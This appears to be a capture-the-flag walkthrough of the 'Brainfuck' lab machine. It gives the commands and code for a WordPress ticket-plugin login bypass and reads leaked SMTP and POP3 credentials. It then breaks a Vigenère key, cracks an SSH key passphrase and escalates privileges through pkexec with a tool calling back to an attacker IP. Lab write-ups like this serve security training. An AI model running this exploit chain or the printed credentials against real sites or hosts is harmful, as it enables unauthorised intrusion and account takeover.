[Meachines] [Insane] Brainfuck: WordPress Ticket System arbitrary user login + SMTP mail credential leak + Vigenère cipher decryption + TRP00F automated privilege escalation + RSA decryption
Word count: 1494 | 2025-08-19 12:40:41
Brainfuck (WordPress Ticket System) penetration testing walkthrough
1. Information gathering
1.1 Target identification
- IP address: 10.10.10.17
- Domains:
- brainfuck.htb
- www.brainfuck.htb
- sup3rs3cr3t.brainfuck.htb
1.2 Port scan
Scan with Nmap:
nmap -p- 10.10.10.17 --min-rate 1000 -sC -sV
Open ports and services:
- 22/tcp: OpenSSH 7.2p2 Ubuntu
- 25/tcp: Postfix smtpd
- 110/tcp: Dovecot pop3d
- 143/tcp: Dovecot imapd
- 443/tcp: nginx 1.10.0 (Ubuntu) + SSL
1.3 Website identification
- WordPress site
- Subdomain: https://sup3rs3cr3t.brainfuck.htb/
2. Exploitation
2.1 WordPress arbitrary user login vulnerability
Because of an incorrect use of wp_set_auth_cookie() in the ticket-system plugin, a request to admin-ajax.php can log in as any user without knowing that user's password.
Exploitation method:
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="admin">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
2.2 SMTP credential leak
The SMTP settings page in the WordPress admin backend exposes stored credentials:
- Path: https://brainfuck.htb/wp-admin/options-general.php?page=swpsmtp_settings
- Username: orestis
- Password: kHGuERB29DNiNE
Verify the credentials against the POP3 service and read the mailbox:
telnet 10.10.10.17 110
USER orestis
PASS kHGuERB29DNiNE
list
RETR 2
One of the mails contains a new set of credentials:
- Username: orestis
- Password: kIEnnfEKJ#9UmdO
3. Cryptanalysis
3.1 Vigenère cipher analysis
Orestis's posts end with a signature of the form "xxxxxxx - xxxxxxx xxx xxx xxx xxxxxx", which has the same structure as "Orestis - Hacking for fun and profit". With a known ciphertext/plaintext pair, each key letter is simply (ciphertext letter - plaintext letter) mod 26.
Decryption process:
- Known ciphertext: "Pieagnm - Jkoijeg nbw zwx mle grwsnn"
- Known plaintext: "Orestis - Hacking for fun and profit"
- Compute the key:
enc = "Pieagnm - Jkoijeg nbw zwx mle grwsnn"
pt = "Orestis - Hacking for fun and profit"
# key letter = (cipher - plain) mod 26; skip spaces and punctuation, which carry no key information
print("".join(chr((ord(e.lower()) - ord(p.lower())) % 26 + ord('a'))
              for e, p in zip(enc, pt) if e.isalpha() and p.isalpha()))
Resulting key stream: "brainfuckmybrainfuckmybrainfuckmybrain"
Key actually used: "brainfuck"
3.2 Decrypting the remaining messages
Decrypt the other ciphertexts with the key "brainfuck":
- Ciphertext: "Ufgoqcbje....Wejmvse - Fbtkqal zqb rso rnl cwihsf"
- The decrypted text contains the URL: https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
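As an added example (not code from the original write-up), the key recovery of 3.1 and the decryption of 3.2 carried through in Python: the key stream is derived from the known signature pair, its shortest repeating period is taken as the key, and the second signature fragment quoted above, whose alignment to the key is unknown because the text before it is elided, is decrypted by searching for the key offset that yields the known plaintext. The ciphertext and plaintext strings are the ones quoted on the page; the function names are my own.

```python
KNOWN_CT = "Pieagnm - Jkoijeg nbw zwx mle grwsnn"   # known pair quoted from the post
KNOWN_PT = "Orestis - Hacking for fun and profit"
# Later fragment of the same thread (quoted on the page); its key alignment is unknown
LATER_CT = "Wejmvse - Fbtkqal zqb rso rnl cwihsf"


def recover_keystream(ct, pt):
    """Key letter = (cipher - plain) mod 26, over alphabetic positions only."""
    ks = []
    for c, p in zip(ct, pt):
        if c.isalpha() and p.isalpha():
            ks.append(chr((ord(c.lower()) - ord(p.lower())) % 26 + ord("a")))
    return "".join(ks)


def shortest_period(stream):
    """Smallest n such that the stream is its first n letters repeated."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return n
    return len(stream)


def vigenere_decrypt(ct, key, offset=0):
    """Decrypt, advancing the key only on letters; offset is the starting key index."""
    out, k = [], offset
    for c in ct:
        if c.isalpha():
            shift = ord(key[k % len(key)]) - ord("a")
            base = ord("A") if c.isupper() else ord("a")
            out.append(chr((ord(c) - base - shift) % 26 + base))
            k += 1
        else:
            out.append(c)
    return "".join(out)


def find_offset(ct, key, expected_pt):
    """Try every key rotation; return the one yielding the known plaintext, else -1."""
    for off in range(len(key)):
        if vigenere_decrypt(ct, key, off) == expected_pt:
            return off
    return -1


if __name__ == "__main__":
    stream = recover_keystream(KNOWN_CT, KNOWN_PT)
    key = stream[: shortest_period(stream)]
    print("key stream:", stream, "-> repeating key:", key)
    off = find_offset(LATER_CT, key, KNOWN_PT)
    print("offset", off, "->", vigenere_decrypt(LATER_CT, key, off))
```

Once the offset for one fragment is known, the whole post can be decrypted with that same key and offset, which is how the id_rsa URL above is recovered.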
4. SSH access
4.1 Fetch the SSH private key
curl https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa -k -o id_rsa
4.2 Crack the private key passphrase
- Convert the key with ssh2john:
ssh2john id_rsa > id_rsa.john
- Crack it with John the Ripper:
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.john
Recovered passphrase: "3poulakia!"
- Strip the passphrase from the key (openssl prompts for it):
openssl rsa -in id_rsa -out id_rsa_dec
4.3 SSH login
ssh -i ./id_rsa_dec orestis@10.10.10.17
Read the user flag:
2c11cfbc5b959f73ac15a3310bd097c9
5. Privilege escalation
5.1 Privilege escalation with the TRP00F tool
python3 trp00f.py --lhost 10.10.16.24 --lport 10031 --rhost 10.10.16.24 --rport 10032 --http 10033
Choose to exploit the pkexec vulnerability (y).
5.2 RSA decryption challenge
The RSA parameters are found in debug.txt and output.txt:
Parameters:
P = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
Q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
E = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
Decryption script (indentation restored; d is reduced mod phi because the extended Euclid coefficient may be negative, and the integer-to-bytes conversion no longer fails on odd-length hex):
def egcd(a, b):
    # Extended Euclid: returns (gcd, x, y) with a*x + b*y == gcd
    x, y, u, v = 0, 1, 1, 0
    while a != 0:
        q, r = b // a, b % a
        m, n = x - u * q, y - v * q
        b, a, x, y, u, v = a, r, u, v, m, n
    gcd = b
    return gcd, x, y

def main():
    p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
    q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
    e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
    ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
    # compute n
    n = p * q
    # compute phi(n)
    phi = (p - 1) * (q - 1)
    # compute the private exponent d = e^-1 mod phi; reduce into [0, phi) since x may be negative
    gcd, x, _ = egcd(e, phi)
    assert gcd == 1, "e must be coprime to phi(n)"
    d = x % phi
    # decrypt the ciphertext
    pt = pow(ct, d, n)
    print("Plaintext:", pt)
    # big-endian bytes of the plaintext integer; to_bytes avoids the odd-length failure of bytearray.fromhex
    pt_bytes = pt.to_bytes((pt.bit_length() + 7) // 8, "big")
    print("Hex:", pt_bytes.hex())
    print("ASCII:", pt_bytes.decode())

if __name__ == "__main__":
    main()
Decryption result (plaintext integer):
24604052029401386049980296953784287079059245867880966944246662849341507003750
Convert it to ASCII (Python 3; the original one-liner used the Python 2 .decode('hex') idiom):
python3 -c "n=24604052029401386049980296953784287079059245867880966944246662849341507003750; print(n.to_bytes((n.bit_length()+7)//8,'big').decode())"
6. Summary
This engagement chained several key steps and techniques:
- Exploiting the WordPress arbitrary user login vulnerability
- SMTP credential leak and extraction of information from mail
- Vigenère cipher analysis and decryption
- Retrieving the SSH private key and cracking its passphrase
- Extracting RSA parameters and decrypting the ciphertext
- Privilege escalation
Each stage exercised a different security technique and analysis method, together forming a complete penetration testing workflow.